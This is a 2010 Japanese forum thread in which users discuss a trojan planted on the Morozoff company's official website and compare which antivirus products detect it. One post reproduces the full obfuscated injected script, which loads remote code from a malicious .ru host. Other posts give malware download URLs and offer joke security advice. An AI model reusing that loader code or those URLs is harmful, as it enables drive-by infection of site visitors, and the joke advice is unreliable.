モロゾフの公式サイトでトロイ配布中

モロゾフのプリンの容器をコップ代わりにする家庭って・・・・・
http://tsushima.2ch.net/test/read.cgi/news/1262592767/
231 名前： スパナ(アラバマ州)[] 投稿日：2010/01/04(月) 22:05:41.87 ID:jV4wBhTt
お前らモロゾフのHP見てみろ
http://www.morozoff.co.jp/

232 名前： カッターナイフ(千葉県)[] 投稿日：2010/01/04(月) 22:06:22.91 ID:gZasu7IR
>>231
やっぱトロイが出る

234 名前： ペーパーナイフ(埼玉県)[sage] 投稿日：2010/01/04(月) 22:10:25.05 ID:kuMQUvUv
>>231
http://www.aguse.jp/?m=w&url=http%3A%2F%2Fwww.morozoff.co.jp%2F&x=48&y=13

依頼506

モルボルさんは関係ないだろ

こんなのでスレ立てしちゃうなんて

００７ゴールデンアイスレ

踏んじまった

モルボル？

http://www.nicovideo.jp/watch/sm5413895
4分40秒な

あばすとさんにおこられたー(´；ω；｀)

↓糞箱売る人

このサイトで配布されてるトロイを検出できないアンチウイルスソフトがどれかを特定してぶっ叩きまくるスレ

うむ。絶賛配布中ですか？

カスペ検出済み

踏んだよ、絶対に許さない

windowsインストーラー　って何(´;ω;`)

え　いつからトロイ仕込まれてたんだ
画像検索でコップの形だけ見たけど大丈夫かなあ

今年初ぷぁーん頂きました

オンボロノートPC
ノーガード戦法の俺は怖くて踏めない

仮想マシンで踏みました
なんかインストールされてる

Tip Taps Tip

火狐が落ちたワラタ
aviraは無反応

マカフィーも検出

マジかよ糞箱売ってくる

JAVA/Agent.S
が出たantvir

>>20
aviraやっぱ糞だな

なんともなかった
スクリプト切ってれば大丈夫なのかな

このスレ監視中

AVG無反応
今シマンテックでオンラインスキャンしてるけど
もしやノートンも検出してくれない？ｗ

安藤美姫のコーチ？

モルさんがどうしたって？

お、アバストさん反応できた？

プァーンプァーンプァーン

>>24 うちのaviraも無反応だったけどwindowsインストーラーがあーちゃらこーちゃらってでてイラナイをクリックしたらプニルが落ちた＞＜;

JavaとActivXがオンならアウトかな

avast!先生大激怒ｗｗｗｗｗｗｗｗ

NTT西の光付属のバスター＆火狐
火狐が不具合発生で強制終了
バスター動かざること山の如し

ttp://gougou-com.ning.com.acer-com.superaguide.ru:8080/pics/JavaGame.jar
のjavaファイルで検知

>>25
オレもなんともない
avastも無反応
firefoxでnoScript入れてるからかな

>>17
ttp://www.aguse.jp/?m=w&mode=1&url=http://www.morozoff.co.jp/
反応だけ見てくれば？

パソコン蛾ぶっ壊れた

windowsインストーラーなんて出なかったな
アクティブXとか切ってれば大丈夫かな？

アバちゃんおｋ

aguseしてみたら、>>1でもうやってあった
トロイぐらいでガタガタ抜かすなよ

ソースの一番下にあるのがトロイのコードかしら
javascript切っとけば大丈夫かな

avastたんは賢いなぁ
いい子　いい子

VB反応しねえな

ウイルス名はJS:Illredir？

ノートン確認した

誤検出っぽいな

(＾＿＾)

MSEはどうだった？

バスター無反応でJAVAが動き始めてFirefoxが落ちた


　　　　　　　　　　　　　　　どうしよう

ＥＳＥＴおっきおっき

>>50
無反応

trojan←なんでこれでトロイって読むんだよ
これじゃトロジャンじゃん

ここのプリンはそれ程旨くないよ。
お前等もいい加減に、本物の味とはどういうものか判別できる
舌を持てよ。

無反応
ま　いっか

トロイって、美味しいの ?

>>54
えっそれトロジャンって読まないの…？知らなかった…

Virustotal
http://www.virustotal.com/jp/

誰かVirusTotalに検体上げてどのソフトが検出できてないか教えてけれ

反応した人達はJavaやActivXを常時オンにしてるの？

なんかいいavastの警告音あったらおくれ！

普段NoScript入れてても
例えばモロゾフの公式サイトをよくチェックするからOffにしてればアウトなわけか
こわいよー

>>59
http://www.virustotal.com/jp/analisis/64b9d4cf390e37a1017b8a585917c0d21c476cdd59193cc3b28fe46861ffd921-1262504703

カスペに遮断された
火狐は落ちなかったが

>>51
FireFox3.5だけどJava動き出して仮想メモリ不足でブラウザ落ちたな
スワップ切って一部RAMディスクに使ってるけど1GB以上あいてるのに・・・

firefox＋No Scriptであばすとぷあーんぷあーん
ブラウザでjavaとjava script切ってもあばすとがぷあーんぷあーん

ソースチェッカーオンラインって閉鎖してたのかよ

うはw ソースの一番下にめちゃくちゃ怪しいJavascriptがｗｗｗｗ

ウィルスバスター無反応だったんだが・・・

>>54
どこかの言語圏はj始まりでもヤとかあるんだよ
jcobがヤコブとかだったかな

トロイも確かそのエリアが発祥だったような

chrome使ってる人
落ちない？

　　　　　／ ;: : : : : :/: : :./: : /l: : : : ､: : : : ヽ:＼
　　　 ／:ィ´: : : : :./: : : /: :./　!:.:.ﾄ､: :＼: : : :.＼}ミヽ､
　　 /／/: : :/: : :/: :.:.;.ｨ: :./ 　ｌ: :.|　ヽ: :.ヽ: : :ヽ:＼:::::::＼
　　　　/: : :/: : : l: : :/　!:./　　|: 十‐弋⌒ﾄ: : : :i:.:.:|::＼::::}
.　　　/: :.ｨ:.!:. : :.:|:''７⌒|:.ｌ　 　l:.:.:{　　 ＼:|: : : : ﾄ､:{::::::::Y
　　　l: :./{ :| : : : |:./　　l/　　　＼ヽ　　　＼:. :.:.:|:.ﾄゝ:::::::〉
　　　|:.∧| :!: : :/l/　　 ､　　 　 　 ヽ,. -　　 ヽ :.:|/:::::::／
　　　l/　 !:.| : ∧　 =＝ミ　　 　 　 ≠⌒ミ　∧: |- イ
　　 　 　 |: l: :.lハ　 　 　 　 　 ,　　 　 　 　 {r ｝:}: : :|
　　 　 　 ヽﾊ:.ﾄ､_}　::::::.　　�卮∨',ﾞ|　::::::　/_ノ|/!: : |
　　　　 　 |: ヽ!: : ゝ､　　 　 ,]-yrイ/ 　 ,.ｨ : : : : !: : |
　　　　 　 |: :l: : : : : :|＞- .,_　　　 ,.. ＜´ |: : : ::.:.!: : |
　　　　 　 |: :l:.!: : : : :l__,ノ:.:r'｀¨¨´{.i:.:.└-|: : : ./＾i : |
　　　　 　 |:.:.l:!: : : : :.|:.:.:.:.:.|＿＿_/:.:.:.:.:.:.:|: : : {　 | :.|
　　　　 　 |: : !: : : : : |:.:.:.:.:.| 　 　 ! :.:.:.:.:.: |: : : .〉　｀ヽ

　　　　　モルボール・ガ・チャバ［Molbor ga Chaba］
　　　　　　　　　　　　(1983〜　日本)

>>7
こいつら何者？　ニコニコのしてみた系の人？
声出す練習した人じゃないと、こういうことしちゃだめだよ。

こんなのに引っかかるなんてトロイんだよ

>>63
> 結果: 6/40 (15.00%)

結果だけ見るとほとんど検出できて無いのな。
誤検出か？

さっき公式サイト見て何もおこらなったけどやばい？

aguseはテンポってるｗ

誤検出じゃないよ。ソース見りゃ一目瞭然。真っ黒ですw

ここのチョコレート美味いぞ

JAVA_BYTEVER.AT - 詳　細
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JAVA%5FBYTEVER%2EAT&VSect=T

AVGはスルー

avast!先生最強伝説ｗｗｗｗｗｗｗｗｗｗｗ

>>75
俺はカスペで反応でてるが、63だと出てないことになってるから実際わからん

ＧＥＮＯじゃないの

スクリプト部分で検知する場合と
スクリプトが走って本体を検知する場合と
全スルーされる場合が考えられる

>>71
落ちない
メモリはかなり持ってかれるけどプロセス切れば開放される

>>67
去年あたりからなんか管理人が日記で変なこと言い出してなかった？
aguseで別に不便ないから良いけど。
Jane上で右クリックでaguse通すこともできるし

お爺ちゃんが飛び起きた

>>63
俺のカスペ2010は検知してるけど

どういう経緯でソースに記入されたんだ？
サイト作った外注の人間が割れ使ってたとか？

ソースの一番下にアヤシイscript式ががが

>>87
そのコマンド便利そうだからくれ

>>63
avira反応してんじゃん

一番下のjavascriptでフザケタURLのロシアサイトに飛んでるね。

>>87
おれもくれ

こっちも
http://www.virustotal.com/jp/analisis/d7b8a9fdf45b1f97fe90780e52b9dafc7730071bf42f007440f3b3837f5dda29-1262612668

どっちかで検知できれば
感染してない…かも

javaスクリプト切ってれば大丈夫っぽいね

しかしAVGにはもうちょっと頑張って欲しい

おいおい今日このサイト見ちまったぞ

>>70
ttp://dictionary.goo.ne.jp/leaf/ej2/75578/m0u/Trojan/
トロジャンらしいぞ
Troyの〜だと

感染するとどういう反応すんの？
Lolifox+Noscript+aviraで数時間前に見たがいつもと変わらん

説明見るとドロッパーか
誰か人柱ダウンロードされるウイルス調べてくれ

モロゾフのプリンの容器をコップ代わりにする家庭って・・・・・
http://tsushima.2ch.net/test/read.cgi/news/1262592767/

↑
まさにこのスレ見てさっきモロゾフのHP見ちゃった
特に変わったことはおきなかったが、
アウト？

MicrosoftってMSEか、検出するとはなかなか・・。

トロイ検出したよーーーーーーーーーーーーー！！！！

　　 プァーンプァーンプァ　＿)ﾉ　プァーンプァーンプァーン
　　 プァーンプァーン　　'´　　 ヽ　ァーンプァーンプァーン
　　 プァーンプァーン　i 　ﾉﾉﾊ）i |　ーンプァーンプァーン
　　 プァーンプァーン　ヽ ( ﾟ ヮﾟﾉﾘ　ーンプァーンプァーン
　　 プァーンプァーン 　 ⊂r∞iつ　ーンプァーンプァーン

>>92>>95
これで大丈夫だろうか？
http://www.aguse.net/result1.php?url=$LINK

モロゾフの印象最悪になった
もうプリン買わねえ

トロイって感染したら具体的にどういう事態になるのかわかりやすく説明しろ誰か

>>63>>96
両方とも検出したソフトが一つもないとは・・・

Googleで「モロゾフ」で画像検索しただけでavastたんがプァーンプァーン言い始めた

MSEとOperaの組み合わせだが無反応。普通に見れるが

<script>/*GNU GPL*/ try{window.onload = function(){var U26gcel3nnek = document.createElement('s@$$&c)$&r$i#(p#$!t!!('.replace(/@|\)|\!|\(|\^|\$|&|#/ig, ''));
var Zavq7z4z78k = 'Imrp1rhevfo';U26gcel3nnek.setAttribute('type', 't(^$e&@&x!!$t!@&/)j((a)v&&a@(^s(!c((r!i$!p!$t!(#'.replace(/\^|#|&|\!|\(|\$|\)|@/ig, ''));
U26gcel3nnek.setAttribute('src', 'h())&t)t$$p@#:)^$)/((^/!$#g!o(&&u^^^g!$o？u!-$&c!)!o)^$$m)@!^.$(#n&)$i#(n^#^g@.&@c&$#o@m(.)
a###!c#(e!$$(r$$-^#c!@o)@!$m@.$^s)(u!@p$$e@r@(a(g(@^u)$&)!i#d!e&!!#.!@^r(^u^:)#8&^#&0#(8)^0^/!!#i@$)#n^$@$.&!)!c&!(o((!m$&&/$i#!$n#!).)$@c#(^o@!$&m(@/@$g@o))o
^&g@&l!#e!.^)c))o@m#&@/$^#v#)i!)#d!^@e&)$)o@)!@@s#z$(.？^c@!$o!m(^^/@b^(&e#!@&s@((t)#$@#t&^)^u&b!(e^)c$^#l!@)i$)&!$p)@s!$^$(.&$c@&)@o)!$m(^#&/('.replace(/\!|@|#|\$|\(|&|\^|\)/ig, ''));
U26gcel3nnek.setAttribute('defer', 'd!$@$e@f!!(&(e^r@)'.replace(/@|\(|\$|#|\!|\)|\^|&/ig, ''));
U26gcel3nnek.setAttribute('id', 'M$e!$7#!)r#!$l？@^9()!(#t$!^9&q#)@$$b&&^!3&@)'.replace(/\^|\)|@|&|\$|\!|\(|#/ig, ''));
document.body.appendChild(U26gcel3nnek);}} catch(Lpmpa57y1j) {}</script>
<!--86fa61201e3ca3a075145a1d33d3c209-->

これっぽいな

>>105
ソースチェッカーと同じ要領でぶちこめばつかえるのか
ありがとう

>>36
MSE 1.71.1682.0で Trojan:Java/Selace.L, Exploit:Java/CVE-2008-5353.C を検出
除去できたよ

MSEはデフォだと24時間に1回しか定義ファイルを更新しないから
レジストリ弄って1時間に1回更新するように変更しないとザルだよ

MSE無反応なんだが

avast先生がお怒りだな

ﾄﾞﾀ
　ﾊﾞﾀ ヽ(*ﾟДﾟ)ノ　ﾓﾛﾀﾞｼ！
　　　　（　　）へ
　　　　　>ω

>>99
http://ja.wikipedia.org/wiki/%E3%83%A4%E3%82%B3%E3%83%96
>>70のjcobは間違いだけど

ラテン語ではJacobus（ヤコブス）

エリアではこういうのがあるんだよ

VPC上で試してみたらMSEが反応した

TrojanDownloader:Win32/Waledac.C

カテゴリ: ダウンローダ型のトロイの木馬

説明: このプログラムは危険であり、他のプログラムをダウンロードします。

推奨: このソフトウェアをすぐに削除します。

プライバシーを侵害する、またはコンピューターに損害を与えるおそれのあるプログラムが
Microsoft Security Essentials によって検出されました。
これらのプログラムが使用するファイルは削除されず、引き続きアクセスできます (推奨されません)。
これらのファイルにアクセスするには、[許可] 操作を選択して [操作の適用] をクリックします。
このオプションを使用できない場合は管理者としてログオンするか、ローカル管理者にお問い合わせください。

項目:
file:C:\WINDOWS\Temp\~TM7D.tmp

この項目に関するオンラインの詳細情報を表示します。
http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?name=TrojanDownloader%3aWin32%2fWaledac.C&threatid=2147627823

>>102
最初に発見されたのが21:30ごろ
http://tsushima.2ch.net/test/read.cgi/news/1262592767/221

それよりも前に見てればセーフ

　　　　　　　　　　　,.ｨ':;'::::::::.:.:.:.:〈/,/:.:.:.:.:.:.:.:.:.:{::ｉ.:.:.:.:.:.:.:.､:､.:.:.:.:.:.:.::＼＼::|　 },.-──-.､
　　　　　　　　　 ／:.:/:::::;ｒ'´￣{:::| |:.:.:.:;':.:/:.:/'|::|:::;ｲ.:..:ｉ:.:|::|､:.:.:.:､:.:.:.::|　|::ゝ/ _＿＿_,／
　　　　　　 　 ／:.:..:.;':;／ 　 　 |:_ｊ |:.::/:.::ﾊ;/　|::.:/ |::::.:}:.:|::| ∨:..|::.:}:::|　|::.:}::::::::､:.:｀ヽ、
　　　　　　　/:.:.:.:.:./'´　 　 ｒ‐γtｊ |:.:ﾄ､::{-‐-､|:/　 V:::;/ｊ;ﾉ-‐∨|;ｲ:.::ｊ .ﾊ:::|~｀ヽ:::ヽ::.:.:＼　　　
　　 　　 　 /:.:.:.:.:./ 　 　 __,{　 {__,,人:ゝ｀`__､　゛　　 ｀'´ ",.__　 　 ,〉::{_,ソ:ﾘ 　 　 ＼:::､:.:.∧　
　　　　　　ｊ:.:.:.:.:.::| 　 ／"　|　　ｊ;ｒ､ﾊ ､,ｨｆﾁ心､ 　 　 　 ,ｨｆﾁ心､,　};;ｒ-､:;/ ￣｀ヽ､__∨:::.:.:.∧
　　　　　　{:.:.:.:.:.:.{ ／ 　 　 | 　 {:/:/} 〈 ｆ_人_}　　　　　 ｆ_人_}　〉　ﾊ　 }　 　 　 ,／´∨::.:.:.:∧_＿
　 　 　 　 |:.:.:.:.:.:.:|'ｭ　__　　 |　 /::/ | ,､弋;Y:ｿ, 　 　 　 弋:Y:ｿ,''｀ ,ﾊ::∨　　　　/　 　 ∨:.:.:.:.:∧　｀ヽ、＿＿_
　 　 　 　 |:.:.:.:.:.:.:|'´~ヽ)　　 |　{:∧_ｊ.　´""　　 　 '　　　　 ゛゛｀　/__〉::}:: 　 　 /　　　　∨::.:.:..:.ﾊ　　 ﾊ 　 ／
.　　　　　 |:.:.:.:.:.:.:|､・,ノ　 　 :|　´　 ∧　　 　 ｒ�卮∨',ﾞ|v､　　　 /:: ..ｊ;/ｭ__::..　/　　　　　.|::.:.:.:.:.:.:|　 　 },／
　　　　　 ｊ:.:.:.:.:.:.::| ＼　　　　∨　　 _∧　 　 {:::,'　 　 　 }　　 ,/:: : :'" __,〉＼/:: : : : : : : : |::.:.:.:.:.:.|. . . :r'ｰ--､
　　　　　 |:.:.:.:.:.:.::|＼/　　　　::＼:／/ 〈＼ 　∨ ,]-yrイ　 ,ｨ'::: :. _,,／/.,　　＼: : : : : : : |::.:.:.:.:.:.|: : : :{､　　　＼
　　　　　 |:.:.:.:.:.:.:.| /　 　 　 ::::／　/ /::;>　＞､`:=ﾆﾆ´ｒ＜::: : : 　 〉　/'"　　　 }､:: : : : : :|::.:.:.:.:.:.|: : : /￣￣￣
　　 　 　 |:.:.:.:.:.:.:::|'　 　 　 ::::/　 :､{∧:::ゝ　 　 ＼　 ／　　 _＿_,ノ　/／　　　/:: ＼: : : :|::.::.:::.:.:|:: ;ノ
　　　　　 |:.:.:.:.:.:.:::|　　　　::::/　 .:::<・・>´`ｰ─-,ｨ'二ﾌｰ＜´ |:::::|　 /'　　　　/:: : ／`ｰ-|::.:.:.::::.:|'"

Microsoftのフリーのアンチウイルスソフト使っているやつどう？
検知した？

さっきエロ同人サイト行こうとしたら同じメッセージが出た

>>119
その理論はおかしくないか？ｗ

つまり、

モロゾフのプリンの容器をコップ代わりにする家庭って・・・・・
http://tsushima.2ch.net/test/read.cgi/news/1262592767/

の>>1が犯人ってことか？

意味不明のスレを立ててトロイをばら撒こうと。
そういう事だな？

>>119
そうなの？途中からウイルス仕込まれたの？

ぷあーんぷあーんキター

英語だとトロジャンて読むのか。
今までずっと頭の中でトロヤンホースって言ってたわ。

でも東欧かどっかでトロヤンて発音するとこもあるみたいだな。
trojan トロヤン でググったら東欧っぽい人名が出てきた。

なしてそげなもぬ書き込まれとんのさどうでもいいけど

avast先生に怒られた

>>119
ありがとう
スレ立ってすぐだったから大丈夫っぽい

モロゾフに教えてやれよ

見に行ったらノートン先生に怒られた。

>>63>>96
ノートンは検出してくれないの？
シマンテックのオンラインでやってるのにｗ

犯人はヤス

バスター無反応

>>132
あ、よかった

このままシマンテックのオンラインを続けます

JavaというかJavaScriptでドライブがないとかいうダイアログがでた

AVGがんばれよおおおおおおお

このスレ見ただけで
お怒りなされたぞ

>>130
その判断はおかしいだろ

ソースネクストのヤツいるか？

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5353

この脆弱性を突いてるみたいだから、Java Runtime Environmentのバージョン
更新してない情弱が死亡。

>>130
残念ながら…

貧乏くせえから空き容器をコップにするのやめろよ

ググっただけで検出される

>>104
腹パン

もしかしてプリンにｒｙ

ここの３００円のプリンでかすぎ。
途中で飽きる。
２００円のはいつも売り切れてるし。

Javaなんて滅多に使わないんだから切っておきなさい

>>119
19:49にカスペが検出したんだが、どうせ誤検出だろうと思って報告しなかったわ。

なんでまかフィーのやつがいないんだよ

とりあえずトレンドマイクロでオンラインスキャンしておくか

>>105
ありがとうございます

>>35
乙でござる　同じもん使ってるから助かっただす〜

ケツ毛さんのケータイ写メ発見した
ttp://userdisk.webry.biglobe.ne.jp/014/752/62/N000/000/004/125584214687716117012_CA3A1225.JPG

中国産のキングソフトアンチウイルスU反応せず
FWでjavaを遮断したからかも？

ノートン先生激怒

Macで見たらどうなる？

pandacloud使ってるやつ検出したか報告しろ

なんで和製のウイルスソフトはないの？

全部外資じゃん泣けてきた

>>158
なんもならない

さすがカスペ先生だな
GENOウイルスに続いてまたも堅実なディフェンスを見せた
検出率テストなんざ当てにならん

>>118が検出された後にもパス盗むウィルスとかが2つほど出てきたけど
なぜかその2つは実行を停止できなかったのでVPC終了
MSE軽くていいと思ってたけど何かダメっぽいな…

>>142
あーゼロデイでは無いのか

avastさん最高や

NOD32きた

ウイルスバスターは？

>>160
ソフトに価値を見出さない日本では伸びないよ

マルウェア情報
1Trojan-Downloader.JS.Agent.ewh


あぶねぇｗ

やっちまったぜ！！

とりあえずChromeのjavaとjavascript無効にしてみた

>>167
無反応

JRE 6 Update 10以前のがインストールされてた奴はご愁傷さま。
それ以後のなら多分大丈夫なんじゃね？

アプレット myf.y.AppletX notloaded

ってやつ？マックでFirefox

http://gougou-com.ning.com.acer-com.superaguide.ru:8080/in.com/in.com/google.com/videosz.com/besttubeclips.com/

ＡＶＧスルーされたんだが対応どうしたらいいかな？

>>160
トレンドマイクロは日本の会社じゃない？
外人がやってるけど

トロージャンと言えば闘いの挽歌

モロゾフ死ねや

firefoxがクラッシュした

AVGだめぽ

カスペ速攻反応したわ

>>172
流石不動の大御所

>>176
カスペの試用版落としてからネットワーク切断して検出しろ

よく考えたら昨日再インスコしてJAVA入ってねーや

>>142
ちょっと前フルスキャンした時、先生が
き弱性あるから更新しとけって指摘してたわ
さすがだな

ＡＶＧが反応したためしがないし、outpostはよくわからないからほとんど許可だしてるしおれのセキュリティやばいな

アバスト入れたんだけど、ノートン先生消しても良いよな？
競合しちゃうよ

>>172
ありがとー
見るのやめとこ・・・

モロゾフの問い合わせフォームに書いてきた。
くだんのスレでも人気よかったのに、へんな評判がたつとかわいそうだ。

pandaの報告まだかよコラ

去年の12月16日に期限切れしたG DATA2008(カスペ+avast)は無反応だった
やっぱ更新しないといかんね

>>176
最近のAVGって重いし検出弱いし
マジでavastにした方が快適
俺も乗り換え組だし

>>177
ありゃ日本法人か代理店でしょ
作ってるのは海外のはずだし

日本人が純粋に作ったソフトではないよね

アプレットのほうか
切ってるから大丈夫だわ

バスターはGENOウイルスでも大敗してたんだから
いまだに使ってるやつは
そろそろ乗り換えとけよ

踏むとどうなるの？
説明頼む
踏んでも何も起こらなかったら安心していいのか？心配したほうがいいのか？

>>142
ウインドーズアップデートしてればオッケーですか？？

>>172
大正解

>>184
了解

バスターの俺、アクセスする勇気がない…
VMwareつぶしちゃったからリアル環境しか残ってないからむ無理。

>>197
まあなんだ
強く生きろ

踏んじまった
javaなんぞアップデート無視してたし

ここまでウイルスバスターＣＭのコピペなし

シャットダウンされた
AVGたん・・・

>>194
いや、本体の本社は日本でしょ
日本で上場してる
海外が子会社だよ
ソフト作ってるのは何処か知らんが

>>178
ゲーセン行くたんびに2回はプレイしてたな。
2面ボスすら越えられなかったが、大好きなゲーム。

>>193
まだavastなんて使ってるやつがいるのかよｗ

Winアップデートすらしてない情弱狙い撃ちっぽくてえげつないな

>>1
俺っちのAVASTちゃんがぷぉぉおおおおおおおおおおおおおおおおおんぷぉおおおおおおおおおおおん！！

バスター何の問題もなし！

バスター最強ｗｗｗｗ

avast最強伝説

NoScript入れてモロゾフのサイト許可してなければ大丈夫？

なんだよ日本には世界でそこそこ使われてるソフトないのかよ
まだ一太郎のほうがましじゃん

ふぃれふぉｘがぶっっこわれた

例えばですね、モロゾフのプリンってあるじゃないですか。
あのガラスのコップって、なかなか捨てれないんですよね。
あれ上等やから、いつも洗うて麦茶入れて飲んだりとかして使ってるんですけど、
あのガラスのコップばっかり家にブワーッと並んでたら
『うわっ、この家貧乏臭い家やなぁ』と思われたらイヤやから、
今度こそモロゾフのプリンもらった時はガラスのコップ捨てなあかんなぁと思うてたんですけど、
こないだね、またモロゾフのプリンもらったんですけど、

また洗うて使てますねん(´・ω・`)

>>208
いやAVASTがフリー最強だしあらゆる機能搭載で設定項目も多いし鉄壁だし

怖くて踏めねえ
ａｖａｓｔ先生信じられない

Javaを最新版にしてないとか真っ裸で町を歩くようなもんだろ・・・

>>202
ちょっと待って
マジなんだよ
パソkんぶっこわれるのか？
はやく対処法を
ぐぐってもイミフ

10年AVG使ってきて無傷だったし
もう一生AVGと人生を共にしていいかと思ってる

>>216
コピペなんだろうけどうちと同じだわｗ

MSEは反応無しだがWisdowsディフェンダーが動作したっぽいな

>>1
これもGENOなのか？

GENOウイルススレ　★23
http://pc11.2ch.net/test/read.cgi/sec/1259607683/

Javaはどこでこうしんすればいいのか教えろ

そのプリン、ウィルスだよ。知らないのか?

ぷおーんぷおーん

ActiveX)(笑

>>220
命まではとられん
安心しろ

賢い人はAVASTを使っているしな。さっ君も今日からAVAST。

無料アンチウイルスのダウンロード - avast! Home Edition http://www.avast.com/jpn/download-avast-home.html

脆弱性

きじゃく?
くじゃく?

ぜいじゃくだろ(笑

読めないやつは情弱(笑

>>220
とりあえず回線を切ります
↓
デザートでも買ってきます
↓
食べます
↓
パソコンをおもむろにゴミ箱に投げ捨てます

AVG無反応
火狐めっちゃ重くなった

JRE 12 で止まってた。
早速最新にUpdateしたよ。

>>225
フォルダごと総上書きでOK！

Java Runtime Environmentのバージョンチェックしてみたらそもそも入ってなかった

Googleでモロゾフ検索しただけで怒られた

ノートン先生は大丈夫

おまえら今更フルスキャンしてんじゃねえよ

前回のAvast騒動でAviraに乗り換えた情弱たち涙目だな
まあ俺のことなんだけど

BitDefender様
ttp://www.death-note.biz/up/i/510.png

>>229
んなことはわかっとるわ

トロイって潜伏期間とかあんの？
トロイなんて始めて踏むからわけえあっわからん
剣syつしないといかによな

>>225
コンパネ→Java→アップデート→今すぐ！

　(1）Microsoft Update（Windows Update）を実行しシステムを最新の状態にする
　(2）Adobe Readerを最新版に更新する
　(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
　(4) JRE(Java Runtime Environment)を最新版に更新する
　(5) Flash Playerを最新版に更新する
　(6) QuickTimeを最新版に更新する

noScriptで余裕でした＾＾

AviraはWEB保護機能ないから仕方ないな

avast最強すぎるｗ
GENOも今回も対応激早だもんな。

comodoスルー

>>242
m9(^Д^)ﾌﾟｷﾞｬｰ

選んだあなたはどうだった？

ぷおーんきました

NTT西日本のセキュリティ対策ツールに死角あり過ぎ

今調べてみたら
このｽﾚの中に感
染者がいるぞ
JaneStyleと火狐使ってる奴でウイルスバスターを起動してるお前だ

>>242
おちつけ

ほい、検出状況。
ttp://www.virustotal.com/analisis/94a2bd34b99ebb992e019c2b7b05e4ed6e6b9400b313b1de1cd60366e2eaa2b3-1262614148

VT初めて見る人への補足。
・ソースネクストのウイルスセキュリティはK7(インド製)
・ウイルスバスターはTrendmicro(VirusBusterはハンガリーの別製品)
・F-Secureは自前エンジン+BitDefender
・G-DATAはavast!+BitDefender
・McAfee-GW-Editionは旧WebwasherのことでMcAfee+AntiVir

>>216
小藪乙

>>242
クロスガッヂしとけ

マカフィー無反応だけど、不自然に貼られたリンクから来たから、
ｊａｖａ止まんないし、なーんかやな感じがして、回線引っこ抜いて
IE8強制終了
javaコントロールとやらのバージョン情報は
バージョン６アップデート17だけど大丈夫かな？

MSEで余裕でした。

>>221
はたして本当に無傷だったのだろうか？

>>242
オンラインスキャンしてこいｗ
それででなけりゃいいだろ？

入れてるウイルス対策ソフトが無能かどうか判別できるサイト
http://inagisou.100webspace.net/hello.html

live2chのtmp.htmlが反応した
どうなってんだ？気持ち悪い

>>242
PC

そのスレ見てどんな器か気になってさっきググって見ちまったｗ
トップ踏まずプリンページだけだけどｗ

ttp://219.94.194.39/up2/src/fu13174.png
ttp://219.94.194.39/up2/src/fu13175.png

ひどいお(´・ω・｀)

つーか、お前らなんでわざわざ踏みに行くの？
馬鹿なの？勇者なの？

AviraとFirefoxだけど、Javaが動き出してFirefoxが落ちた
Aviraは無反応

>>206
日本と台湾でしか売れないから名目上の本社を日本に置いてるだけで
実質は台湾企業(台湾内ではASUSTeKよりブランドは上とされる)、
研究開発のラボはフィリピン。

>>264
俺はチョコレートのページを見た
avast無反応だった

Javaコントロールパネル→基本→バージョン情報
Javaバージョン6　アップデート17　（ビルド1.6.0_17-b04）

JREって入れたらここに出るの？
入れないといけないの？

(　^ω^　)

ウイルスバスターアップデート中に踏んでしまった・・・・

ソース見ると顔文字 r(^u^:) みたいのが入ってるのが嫌な感じよね。

>>173
今コントロールパネルからJAVAのバージョン情報をチェックしたら
バージョン6　アップデート17って書いてあった。
やったー

マカフィーは？

svchost.exe←これなんて読むんだ

つか、Javaが6-17なら大丈夫だよな

AVGで火狐重くなる以外は何も無かったんだけどアウト？
JavaScript有効でJavaは切ってあるんだけど

火狐だと無事ってことでおｋ？
ノートン先生が無言なんだけど

>>276
.exeはヤバイ

avast先生大激怒ｗｗｗｗｗｗｗｗｗｗ
(){eval(unescape(('Script(t,'%')))})(/./g);

>>274
俺漏れも
アップデートなんか不断絶対しないのに
数日前酔ったいきおいでやった模様

このスレ内にrediretor貼ったの誰だよ…

どんどん重くなるこわいよおおおおおおおおお

>>274
俺同じバージョンだけどカスペが検出したぞ

よくわからないがESETに提出しろと言われたので提出しといた

>>278
ＪＳが悪さするんだからアウト臭くないか？

今日もアホだなお前らは

しっかしおちおちWebも見られないね
モロゾフ好きだし、プリンカップはインコのプーちゃんが頭を突っ込んで自分の声の反響を楽しんでるのに

>>276
エスブイシーホスト

>>279
火狐+カスペ
遮断された　２３：２０

んん、ふんだのにカスペ試用版いれて更新してスキャンしたがウィルス検知しない
OSはXPでwindowsupdateは普段してる

で、何でトロイがこのサイトに入ってるんだよ

ていうかJavaって月イチの自動更新機能付いてるんだから、
それ切ってたりしてなければ大体の人は大丈夫だろ

毎日再インスコしたらよくね

んで、誰かモロゾフに教えてやったやつはいるのか？ｗ

>>290
エスブイチョストだろ

avast更新ｷﾀ━(ﾟ∀ﾟ)━!

opera でみたらfoxit readerが立ち上がって
ChangeLog.pdf が開いた

意味分からん

ウェブ監視ないフリーソフトってMSEと他に何があったっけ？

ググっただけでavastが暴れた

>>276
蕎麦チョスト

うぇｂ監視は重いから切ってるし

>>276
スベチョストだろ

>>23はPremiumのwebguardが反応
フリー版なんかｼﾗﾈ

>>288
明日もはりきっていきましょう！

>>287
マジか
ついでだし休暇最後の一日を再インスコに費やそうかな

>>300
Avira Free

バージョン6　アップデート17だったわ
道理でアクセスしても何も起こらんはずだ

だいじょぶだいじょぶ。おまえらどんだけビビビビビビってんだよ

今のところ
avast　対応
カペル　対応
ノートン　最新で対応？
MSE　最新で対応

Avira・AVG・バスターは非対応？

バスター無反応だったから、シマンテックのオンラインスキャンやってるけど検出されない。

>>279
ノートン先生未対応　>>254

スレ開いた瞬間にあばすとさんに怒られた

どういうこと？誰がやったの？５行以内で頼む

大丈夫っぽい

>>299
AdobeReaderが古いとそのpdfがexeを拾って実行する。
Foxitは知らん。

<script>/*GNU GPL*/ try{window.onload = function()
ここ以下がウイルスをインストールするJSで、
他サイトからウイルス本体をゲットしてPCにインスコ

noscript入れてあるから大丈夫だろたぶん

>>265
おいおい

>>225
JANEに見えたわすまんこ(TωT)

　　　　　栃　　　　木　　　　は　　　　ク　　　　ソ　　　　田　　　　舎　　　　　
http://tsushima.2ch.net/test/read.cgi/news/1262610498/228


228 名前： ニッパ(東京都)[] 投稿日：2010/01/04(月) 22:46:12.74 ID:rWOpbbRK
お前らモロゾフのHP見てみろ
http://www.×××/


こいつも同罪だな

>>276
SerViCe HOST

